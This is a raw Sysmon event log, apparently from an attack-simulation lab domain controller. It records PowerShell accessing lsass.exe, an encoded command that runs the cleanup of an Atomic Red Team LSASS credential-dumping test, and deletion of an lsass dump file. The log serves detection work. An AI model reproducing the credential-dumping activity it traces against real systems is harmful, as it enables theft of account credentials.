AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006186Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.899{D28789B6-7C62-5FA1-0B00-000000008801}8684780C:\Windows\system32\lsass.exe{D28789B6-7CE2-5FA1-5201-000000008801}4968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006185Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.899{D28789B6-7C62-5FA1-0B00-000000008801}8684780C:\Windows\system32\lsass.exe{D28789B6-7CE2-5FA1-5201-000000008801}4968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006184Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.867{D28789B6-7CE2-5FA1-5201-000000008801}4968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_fylwhqam.tqy.ps12020-11-03 15:53:06.867 10341000x80000000000000006183Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.852{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7CE2-5FA1-5201-000000008801}4968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006182Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.836{D28789B6-7CE0-5FA1-3001-000000008801}47404528C:\Windows\system32\conhost.exe{D28789B6-7CE2-5FA1-5201-000000008801}4968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006181Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.820{D28789B6-7CE1-5FA1-4001-000000008801}48042868C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CE2-5FA1-5201-000000008801}4968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3ed3|UNKNOWN(00007FF8DCAD7813) 10341000x80000000000000006180Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.820{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006179Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.820{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006178Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.820{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006177Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.820{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006176Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.820{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006175Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.820{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006174Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.820{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006173Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.820{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006172Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.820{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006171Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.820{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CE2-5FA1-5201-000000008801}4968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006170Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.820{D28789B6-7CE1-5FA1-4001-000000008801}48042868C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CE2-5FA1-5201-000000008801}4968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f0374a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f035be(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f85dea(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30efc1a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+319b5399(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30ec499e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f22e6d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f06363(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30ef82e8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f31478(wow64) 154100x80000000000000006169Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.833{D28789B6-7CE2-5FA1-5201-000000008801}4968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{D28789B6-7CE0-5FA1-AF9E-0B0000000000}0xb9eaf0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CE1-5FA1-4001-000000008801}4804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEMAbABlAGEAbgB1AHAA 10341000x80000000000000006168Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.805{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CE2-5FA1-5101-000000008801}2524C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006167Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.805{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006166Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.805{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006165Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.805{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006164Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.805{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006163Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 